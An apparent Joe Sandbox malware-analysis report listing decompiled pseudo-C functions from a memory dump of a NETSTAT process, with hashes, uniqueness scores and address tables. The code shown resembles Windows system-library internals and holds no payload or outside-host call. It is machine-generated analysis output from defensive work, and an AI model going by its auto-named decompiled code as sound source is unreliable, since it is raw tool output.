                • Opcode ID: 6cf53b7312a628df60108e9d4e57dcd8d03fa2575b31d9ca9947c17c0cc97502
                • Instruction ID: 92a98ae1ca19bdd125f7abe53eb74e00d266a423251cdb490a5fda530a022c26
                • Opcode Fuzzy Hash: 6cf53b7312a628df60108e9d4e57dcd8d03fa2575b31d9ca9947c17c0cc97502
                • Instruction Fuzzy Hash: 2121F2739003889BC721EF68E9C4B6BB7ECEF85640F480956F950DB250E734C908C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0342070D Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0342070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E034207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0341AFDE( &_v8,  &_v12);
					E03421293(_t38, _v28, _t60);
					if(E03377D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E034114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                0x0342071b
                0x03420724
                0x03420734
                0x03420738
                0x0342074b
                0x0342074b
                0x03420753
                0x03420753
                0x03420759
                0x0342075d
                0x03420774
                0x03420779
                0x0342077d
                0x03420789
                0x03420795
                0x034207a7
                0x03420797
                0x034207a0
                0x034207a0
                0x034207af
                0x034207c4
                0x034207cd
                0x034207cd
                0x034207af
                0x034207dc

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction ID: 7e65fe74e608d37f5eeef4de6cdaa033a8f2e1bd4b75f93f7ba5be9fb1cbc74d
                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction Fuzzy Hash: 8A21223A2046109FC705DF18C880A6BBBE5EFC0350F08852EF994AF381D730D809CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D7794 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E033D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3447b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0339F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03377D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03399AE0();
					_t24 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                0x033d7799
                0x033d779a
                0x033d779b
                0x033d77a3
                0x033d77ab
                0x033d77ae
                0x033d77b1
                0x033d77b1
                0x033d77bf
                0x033d77c4
                0x033d77c8
                0x033d77ce
                0x033d77d4
                0x033d77e0
                0x033d77e0
                0x033d77d6
                0x033d77d6
                0x033d77de
                0x00000000
                0x00000000
                0x033d77de
                0x033d77e5
                0x033d77f0
                0x033d77f3
                0x033d77f6
                0x033d77fd
                0x033d7800
                0x033d780c
                0x033d7818
                0x033d782b
                0x033d781a
                0x033d7823
                0x033d7823
                0x033d7830
                0x033d7831
                0x033d7838
                0x033d783d
                0x033d783e
                0x033d784f
                0x033d784f
                0x033d785a

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ce5f2f504f91afb68f20e15b50f826584c7ff1e0cc855c08562ff4299048fd3
                • Instruction ID: bcaa1e6554c56d5f6fa2680188a60922a6e78e86c8f9171c128d1e2afa5b4ed7
                • Opcode Fuzzy Hash: 0ce5f2f504f91afb68f20e15b50f826584c7ff1e0cc855c08562ff4299048fd3
                • Instruction Fuzzy Hash: DE219D76900644EFC725DF69DCC0EABBBA8EF48340F14056DF50ADB650E634E900CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337AE73 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0337AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03377D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03377D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03377D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03377D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E033D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                0x0337ae78
                0x0337ae7c
                0x0337ae7e
                0x0337ae81
                0x0337ae86
                0x0337ae8d
                0x033c2691
                0x0337ae93
                0x0337ae93
                0x0337ae93
                0x0337ae98
                0x0337ae9d
                0x033c26a2
                0x033c26b4
                0x033c26a4
                0x033c26ad
                0x033c26ad
                0x033c26b9
                0x00000000
                0x033c26bb
                0x00000000
                0x033c26bb
                0x0337aea3
                0x0337aea3
                0x0337aea3
                0x0337aeaa
                0x033c26c0
                0x033c26c9
                0x033c26c9
                0x0337aeb3
                0x033c26d4
                0x033c26e1
                0x00000000
                0x00000000
                0x033c26e7
                0x033c26ee
                0x033c26f0
                0x033c26f9
                0x033c26f9
                0x033c2702
                0x033c2708
                0x033c2708
                0x033c270b
                0x033c270f
                0x033c2711
                0x033c2711
                0x033c2725
                0x033c2725
                0x00000000
                0x0337aeb9
                0x0337aeb9
                0x0337aebf
                0x0337aebf
                0x0337aeb3

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction ID: c479c20985b50f4c2c6d66064bb94ac07e70820ece5e603b7fdac9a30423c738
                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction Fuzzy Hash: 49218071A216819BDB25DB69C9C4B2677E8AF44650F1D04A4ED04CBBA2EBB8DC50C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338FD9B Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0338FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E033676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                0x0338fd9b
                0x0338fda0
                0x0338fda1
                0x0338fdab
                0x0338fdad
                0x0338fdb0
                0x0338fdb8
                0x0338fe0f
                0x0338fde6
                0x0338fde9
                0x0338fdec
                0x033cc0c0
                0x0338fdfe
                0x0338fe06
                0x0338fe06
                0x033cc0c8
                0x0338fe2d
                0x0338fe2d
                0x00000000
                0x0338fe2d
                0x033cc0d1
                0x033cc0e0
                0x033cc0e5
                0x033cc0e5
                0x033cc0e8
                0x00000000
                0x033cc0e8
                0x0338fdf4
                0x00000000
                0x00000000
                0x0338fdf6
                0x0338fdfa
                0x0338fe1a
                0x0338fe1f
                0x0338fe1f
                0x0338fdfc
                0x00000000
                0x0338fdfc
                0x0338fdcc
                0x0338fdd0
                0x0338fe26
                0x00000000
                0x0338fe26
                0x0338fdd8
                0x0338fddb
                0x0338fddd
                0x0338fde0
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction ID: c1b53e6ae580bddbcd94f03eaf77d7d548a02863a5f689a9720a6049feebd36c
                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction Fuzzy Hash: CC217C72A00740DFC731DF09E980A66F7E9EB94A14F28816EE9498BA24D734EC01CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338B390 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E0338B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03372280(_t12, 0x3448608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E033900C2(0x3448608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                0x0338b395
                0x0338b3a2
                0x0338b3a5
                0x0338b3aa
                0x0338b3b2
                0x0338b3ba
                0x0338b3bd
                0x0338b3c0
                0x0338b3c4
                0x0338b3c9
                0x033ca3e9
                0x033ca3ed
                0x033ca3f0
                0x033ca3ff
                0x033ca403
                0x033ca409
                0x00000000
                0x00000000
                0x033ca40b
                0x033ca40b
                0x033ca40f
                0x033ca415
                0x033ca423
                0x033ca423
                0x033ca415
                0x0338b3d1
                0x0338b3e8
                0x0338b3e8
                0x0338b3d9

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e98b5e283a1a53a4048367fd0338927ceb945d991f549f259326c0742755968d
                • Instruction ID: 8515b5c15f6c536d52a70b9388770bda0e1458cdbbe77f37b0caeee1ad5b8eb5
                • Opcode Fuzzy Hash: e98b5e283a1a53a4048367fd0338927ceb945d991f549f259326c0742755968d
                • Instruction Fuzzy Hash: D9116B377112189BCB28DB148DC1A6BB25AEBC5370B29013EDD1ACB790CA769C02C794
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03359240 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E03359240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x342f708);
				E033AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E033995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E033995D0();
				_t33 =  *0x34484c4; // 0x0
				L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x34484c4; // 0x0
				L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x34484c4; // 0x0
				E03372280(L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x34486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E033995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E033995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03359325();
					_t50 =  *0x34484c4; // 0x0
					return E033AD0D1(L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                0x03359240
                0x03359242
                0x03359247
                0x0335924c
                0x0335924e
                0x03359255
                0x03359257
                0x0335925a
                0x0335925f
                0x0335925f
                0x03359266
                0x03359271
                0x03359276
                0x03359279
                0x0335927e
                0x03359295
                0x0335929a
                0x033592b1
                0x033592b6
                0x033592d7
                0x033592dc
                0x033592e0
                0x033592e6
                0x033592e8
                0x033592ee
                0x03359332
                0x03359333
                0x03359337
                0x03359338
                0x0335933a
                0x0335933a
                0x0335933d
                0x03359342
                0x03359342
                0x03359345
                0x03359349
                0x0335934e
                0x03359352
                0x03359357
                0x033592f4
                0x033592f4
                0x033592f6
                0x033592f9
                0x03359300
                0x03359306
                0x03359324
                0x03359324

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 943678d2901686e8cee94b13e51ec460739a128bf5c92f96eb07305e53f40a8f
                • Instruction ID: 9171742945ef4b8d634626d76ec9363f7ac837b26cfbcb11bbc9dde43c2519eb
                • Opcode Fuzzy Hash: 943678d2901686e8cee94b13e51ec460739a128bf5c92f96eb07305e53f40a8f
                • Instruction Fuzzy Hash: FC215936440A40DFC721EF28CA80F6AB7F9FF18704F1545A8E0499A6A2DB39E942DB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033E4257 Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E033E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x34308d0);
				E033AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E033E41E8(__ebx, __edi, __ecx, _t39);
				E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x34487e4;
					_t18 =  *0x34487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3445cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x34487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x34487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03357055(_t31 + 0xfffffff8);
								_t24 =  *0x34487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x34487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3445cd0;
				if( *0x3445cd0 <= 0) {
					L03357055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x34487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x34487e8 = _t30;
						 *0x34487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E033AD0D1(L033E4320());
			}















                0x033e4257
                0x033e4257
                0x033e4257
                0x033e4259
                0x033e425e
                0x033e4263
                0x033e4265
                0x033e4273
                0x033e4278
                0x033e427c
                0x033e427f
                0x033e4281
                0x033e4287
                0x033e42d7
                0x033e42d7
                0x033e42da
                0x033e428d
                0x033e428d
                0x033e428f
                0x033e4292
                0x033e4297
                0x033e429c
                0x033e42a0
                0x033e42a6
                0x033e42a8
                0x033e42ae
                0x033e42b3
                0x00000000
                0x033e42ba
                0x033e42ba
                0x033e42bf
                0x033e42c5
                0x033e42ca
                0x033e42cf
                0x033e42d0
                0x00000000
                0x033e42d0
                0x033e42b3
                0x00000000
                0x033e42a6
                0x033e429c
                0x033e42dc
                0x033e42dc
                0x033e42e3
                0x033e4309
                0x033e42e5
                0x033e42e5
                0x033e42e8
                0x033e42ee
                0x033e42f0
                0x00000000
                0x033e42f2
                0x033e42f2
                0x033e42f4
                0x033e42f7
                0x033e42f9
                0x033e4300
                0x033e4300
                0x033e42f0
                0x033e430e
                0x033e431f

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d7bb39ecba68eb14b14ccfcb5da3e64cdf9cd7804521d9b2706951db6c84225
                • Instruction ID: 9a85ae6909d274551bbcbbb997c674421d0ad43236b18eab6de7a51495f0e799
                • Opcode Fuzzy Hash: 3d7bb39ecba68eb14b14ccfcb5da3e64cdf9cd7804521d9b2706951db6c84225
                • Instruction Fuzzy Hash: DF219D78900720CFDB14EF2ADA90A24B7F5FB89354B6482BEC1159F6D8DB36D481CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03382397 Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E03382397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x344848c != 0) {
					L0337FAD0(0x3448610);
					if( *0x344848c == 0) {
						E0337FA00(0x3448610, _t19, _t27, 0x3448610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03382581(0x3448610, 0x33350a0, _t26, _t27, _t28);
						E0337FA00(0x3448610, 0x33350a0, _t27, 0x3448610);
					}
				} else {
					L1:
					_t11 =  *0x3448614; // 0x1
					if(_t11 == 0) {
						_t11 = E03394886(0x3331088, 1, 0x3448614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03382581(0x3448610, (_t11 << 4) + 0x3335070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                0x033823b0
                0x033823b6
                0x03382409
                0x03382415
                0x033c5ae9
                0x00000000
                0x0338241b
                0x0338241b
                0x0338241d
                0x03382427
                0x0338242e
                0x03382430
                0x03382430
                0x033823b8
                0x033823b8
                0x033823b8
                0x033823bf
                0x033823fc
                0x033823fc
                0x033823c1
                0x033823c3
                0x033823d0
                0x033823d8
                0x033823d8
                0x033823dc
                0x033823de
                0x033823e1
                0x033823e1
                0x033823ec

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a9767468ae6d618bcda0353cc67564469101b94355458de1e7ff56f714aaf715
                • Instruction ID: 849d8c4c03936ba104c4d3ff53d94c3168b9e6e962eb4866b4e3e8e160dd04d8
                • Opcode Fuzzy Hash: a9767468ae6d618bcda0353cc67564469101b94355458de1e7ff56f714aaf715
                • Instruction Fuzzy Hash: 7F112679B443486BE770FB2AACD0B17B2CCAB50611F188836FA02EF290D7F5E8458754
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D46A7 Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E033D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0339F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0338D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L033777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                0x033d46b7
                0x033d46ba
                0x033d46c5
                0x033d46c8
                0x033d46d0
                0x033d46d4
                0x033d46e6
                0x033d46e9
                0x033d46f4
                0x033d46ff
